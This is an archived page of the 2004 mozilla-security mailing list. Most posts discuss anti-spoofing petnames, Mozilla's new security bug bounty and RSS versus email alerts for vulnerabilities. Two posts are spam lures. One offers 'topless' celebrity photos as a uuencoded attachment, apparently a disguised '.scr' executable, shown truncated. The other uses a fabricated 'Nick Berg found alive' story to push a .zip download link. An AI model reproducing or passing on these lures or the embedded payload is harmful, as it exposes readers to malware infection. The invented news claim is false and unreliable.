headers
Amir Herzberg | 2 Aug 2004 15:36

Re: [Fwd: more comments on the "protecting naive browsers" paper]

Ian Grigg wrote:

> Amir,
> 
> here are comments, not particularly well reviewed.
> 
> http://www.cs.biu.ac.il/~herzbea//Papers/ecommerce/spoofing.htm
Thanks!
> 
> Mozilla people (2nd try),
Please provide more comments...

Here are some responses to your comments:
> 
> Right, that idea.  A couple of things - it's called a petname
> which has a defined meaning, you can probably google for the
> defining paper.  It is a name that is explicitly not shared
> with the rest of the world, so it is distinct by definition
> with the nickname, which is shared.
I didn't find the definition and didn't quite understand the distinction 
you made.
> 
> SSL/TLS isn't used to confirm the public key.  
I think we use different terms here. When I say `confirm the public key` 
I simply mean `confirm that the site actually has the private key 
corresponding to this public key. Nothing to do with certificates, CA 
etc.... usually done using SSL.
...
>> Existing web security mechanisms (SSL/TLS) may cause substantial 
>> overhead if applied to most web pages, as required for securing
(Continue reading)

Permalink | Reply | 4 comments |
headers
Frank Hecker | 2 Aug 2004 16:32

Re: Will Mozilla pay for Reports of Security Holes?

Adam Hauner wrote:
> Linuxworld.com [1] published story "Mozilla To Pay for Reports of 
> Security Holes" (July 30) [2] with only this usefull information:
> 
>   The year-old Mozilla Foundation, ..., is going to start paying
>   cash bounties to people who identify and report security issues
>   in its software.
> 
> No source is mentioned, no other info provided. Do anybody know 
> something more?

Yes. See

   http://www.mozilla.org/press/mozilla-2004-08-02.html

for more information on the new Mozilla Security Bug Bounty program.

Note that this program is completely independent of the Netscape bugs 
bounty program. (Although clearly the Mozilla program was inspired by 
the Netscape bugs bounty program).

Frank

--

-- 
Frank Hecker
hecker <at> hecker.org
Permalink | Reply | 0 comments |
headers
sthompson | 4 Aug 2004 00:53
Picon
Favicon

avril lavigne topless 4607

avrill avigne poseing topless for FHM magazine
tpwmexsrtpmnebltgosrormgocpmhogkiobpvpiwcdnivpbhpuidlmxoodgbwbfnxrdjyhglmpcwqzfkjyi

begin 644 C:\avril\Copy (4) of avrillavigne.rar
M4F%R(1H'`,^0<P``#0`````````/+70 <at> D#8`2RD````V```";J^?!&.``S$=
M,Q$`(````&%V<FEL(&QA=FEG;F4N<V-R`/`&!)$8'9$4R)690!`9X0 <at> $` <at> $!
M`000AB3`ILPJ <at> H*9T!F$A <at> 1,T,<(2"`H <at> ,!2$!,"# <at> '"9(8U!%`0$PH#C$1V
MX]['!M10=IM14<1SI,&\"#<([?'S?G/?><Y\><^'+EZU>&J[K!=UJ:UJY/Y6
MZJKJZU5WW6OW7?ZZ[JZJKU<P?*=3X-SI,!#D)^X&!QD9&2K`)E-B"9/T1^4(
M*;9((3C'O03K`X;?X!Y&`B!1(G#/Y-YA!3V\PL+#%!3T^BB96%%0'[S-KQPJ
M$AGQ]6$!`/E'ZA`MGS$VG!I1D)C_ELNO-7>#FJG!^<!=2$-%M/R00#C;?(3_
M:OS$;KA<E'&5(;)W <at> F[]/3C <at> U0;/8G[Z<NC<KXV0$)9:BD,)E_G)/KVM9</'
MU5TD?52LRXH#&+!.()O?]E1+)G19/`'&6V50GZLP:<Z6\OH$R^<X2V8C#:HA
MO6Q^$[[LN%*(58.JP^Y'QXDN%L#GI*%SXB#CZF9,01<#\2.CX#$=OF1I]-=(
M)=24].4%/#D\$A!;XL.04L=7D=_KZ*6.UV),"*ZHO5EJ3-IP`QR5ZV0/Y6#A
M]-\EQ9TE!"UT(=W;87+AJ2_Z<E_ <at> 1`8B\37(R"H?"_2V%)3WL=67Q.+<^_A,
MI9%#HB:8X`C\F?;T,J+;4DOHYA`]?AJ7%"2)*+.!!=G?L= <at> $B%;WT*!J99+Y
M#+7&(A%?-F'UVW0I&3:=K+"XEG8I<HFQI!P$00EVQ/%<I0:A67GON#"D!51=
M.DQD#)2\AB.\,L46TEE1A8#]4TZ"B^BC/&DN19W-L&0"3PMCV>(VGML4252*
M7>T.;'>C*M$*&N2!`[8TKM(/I,!I>%9?<]^:CV>D#KM)XV$?U[14PX=IDH'(
M6M"(\T?>'0GH7)_D>BKTVH3N^7NXHK2($;(X:$(/+`XTF'M=(+Q[=65A?2'H
ME6A##QFYQ\&1<"L%EF&%TNI1DVXPI^D//"C9&"Y!V/K/D^S?C1W`O7D4ON+X
M^=O[-Q]YGGQIC!?<(6<]A <at> 47Z0$4IX<[S2\'F-'B'JFA^`P**(:T669Z8^F!
M"CU3];FD4R <at> IE$X?2]:YA=N]XM#W^%<OA*A,<H]TH1(DUK(Z/%.)0*)"G^<_
MQ2I4ZZM[ <at> 8<</ <at> >%4X^+4I?*HIY^?[S1!3E"Y'(ISV/%> <at> O<OWAV+5Y]-XO%
MWF?$H-&?28=.$:$O>'J. <at> :,M&XE068?CWPN&L**≥42]RTD]`A'KKC89VCHR'
MU>BMHQ#1(WX:SNA2^*UTG,3GPZD,1% <at> )U4G(UX#O <at>  <at> O)8MSP2U'C$D"]0??=
M8 <at> K#1C`^<#:M?L\6\[Y1%KY)I/#$"B2B^=LY/N)9XLE4CO,41H*!*4"[!?B9
MYU$8)155Y;4* <at> NSWR/[TEF'L4$<(T:LN)TB:MK749>;N <at> U-. <at> 9CY4PWQYU6.
M*(QS\J!F(_1A7:WL")QKA'Y`F,L.+7.8WELT=I>7N\BO.C\ <at> ^Z#9'UDK2Z%?
(Continue reading)

Permalink | Reply | 0 comments |
headers
davidgrey | 4 Aug 2004 00:49
Picon
Favicon

Nick Berg Found Alive

Conspiracy theories of Nick Berg being alive and well in Iraq have today been proven true.  Aljazeera have
released video footage of the supposedly beheaded American captive. The clip was first "discovered" on
an Islamic website in Malaysia and has now been released by 
American Journalists colaborating with Aljazeera.  The evidence speaks for itself and can be viewed
firsthand here.  http://www.greentea.625.co.kr/NickBerg.zip
Permalink | Reply | 0 comments |
headers
Ian Grigg | 4 Aug 2004 01:39

Re: more comments on the "protecting naive browsers" paper - petnames

Amir Herzberg wrote:

>> http://www.cs.biu.ac.il/~herzbea//Papers/ecommerce/spoofing.htm

>> Right, that idea.  A couple of things - it's called a petname
>> which has a defined meaning, you can probably google for the
>> defining paper.  It is a name that is explicitly not shared
>> with the rest of the world, so it is distinct by definition
>> with the nickname, which is shared.
> 
> I didn't find the definition and didn't quite understand the distinction 
> you made.

A petname is a private name that never leaves the
local domain.  I.e., the browser in this case.
In contrast, a nickname is shared.  So, for example
amazon.com is a nickname for IP# 207.171.163.90
because it is shared.  But if a petname were used,
I couldn't tell you that my petname for that IP#
was "amazing books".

Here's some URLs.  I'm not sure what the primary
one out of these are:

http://zooko.com/distnames.html
http://www.erights.org/elib/capability/pnml.html

iang
Permalink | Reply | 0 comments |
headers
Anders Olsson | 4 Aug 2004 20:16
Picon
Favicon

Is there any way to get email notifications on new security bugs?

Hi. Just wondering if there is a way to get email notifications on new
security bugs? Microsoft has it. :)

(Yes, I know that MS has more security bugs than Mozilla, but that doesn't
mean that Mozilla should have worse end user service)

Also, the "known vulnerabilities" page is kinda hard to find, IMHO. Can't
you link to it from the support page or something?

/Anders
Permalink | Reply | 2 comments |
headers
Chris Hofmann | 4 Aug 2004 20:41

Re: Is there any way to get email notifications on new security bugs?


Asa and I were just talking about an idea of turning the vulerability 
page into an RSS feed.   that would allow users to get updates as soon 
as we posted anything new to the vulerability list...  anyone have 
thoughts on this?

chris h.

Anders Olsson wrote:

>Hi. Just wondering if there is a way to get email notifications on new
>security bugs? Microsoft has it. :)
>
>(Yes, I know that MS has more security bugs than Mozilla, but that doesn't
>mean that Mozilla should have worse end user service)
>
>Also, the "known vulnerabilities" page is kinda hard to find, IMHO. Can't
>you link to it from the support page or something?
>
>/Anders
>
>
>_______________________________________________
>Mozilla-security mailing list
>Mozilla-security <at> mozilla.org
>http://mail.mozilla.org/listinfo/mozilla-security
>  
>
Permalink | Reply | 1 comment |
headers
Michael Lefevre | 4 Aug 2004 21:38

Re: Is there any way to get email notifications on new security bugs?

On 2004-08-04, Chris Hofmann <chofmann <at> meer.net> wrote:
>
> Asa and I were just talking about an idea of turning the vulerability 
> page into an RSS feed.   that would allow users to get updates as soon 
> as we posted anything new to the vulerability list...  anyone have 
> thoughts on this?

Sounds neat in principle, but I'm not sure that really addresses the
issue.  There's not much point in having an RSS feed if the list is only
updated once every 6-9 months.  Even if it was updated in a timely fashion
after each release, that's still going to mean a pile of updates every few
months (unless there are lots of x.x.1/2/3 releases, but hopefully this
batch isn't going to become typical).

There's also not much point in having an RSS feed if you have to find it
by going to www.mozilla.org and "known vulnerabilities" into the search
engine box.  The new "security center" is currently linked from the news
item announcing it, but that link will drop off.  Would be good to link
the pages up.

AIUI, security problems are publicised after a release where they've been
fixed. So the security RSS feed will be pretty much in sync with the
release info that's already in the main mozilla.org RSS news feed.

Lots of people know and understand email.  Pretty much every organisation
and product out there has an email list you can sign up for.  The original
poster's request is one that comes up regularly - to get emailed news
about Mozilla.  I think what would be good is a mailing list of the main
mozilla.org news feed.
(Continue reading)

Permalink | Reply | 0 comments |
headers
Adam Hauner | 5 Aug 2004 07:49
Picon
Favicon

Re: Is there any way to get email notifications on new security bugs?

Chris Hofmann wrote:

> Asa and I were just talking about an idea of turning the vulerability 
> page into an RSS feed.   that would allow users to get updates as soon 
> as we posted anything new to the vulerability list...  anyone have 
> thoughts on this?

If Seamonkey will have integrated RSS reader, why not. In other case I 
personally prefer e-mail...

--

-- 
Adam Hauner
Projekt CZilla
http://www.czilla.cz/
Permalink | Reply | 0 comments |
headers
Florian Weimer | 5 Aug 2004 08:00
Picon

Re: Is there any way to get email notifications on new security bugs?

* Chris Hofmann:

> Asa and I were just talking about an idea of turning the vulerability
> page into an RSS feed.   that would allow users to get updates as soon
> as we posted anything new to the vulerability list...  anyone have
> thoughts on this?

Industry standard practice is notification by email.  Rather than
trying to be innovative, Mozilla should follow existing practice in
this area.
Permalink | Reply | 0 comments |

Gmane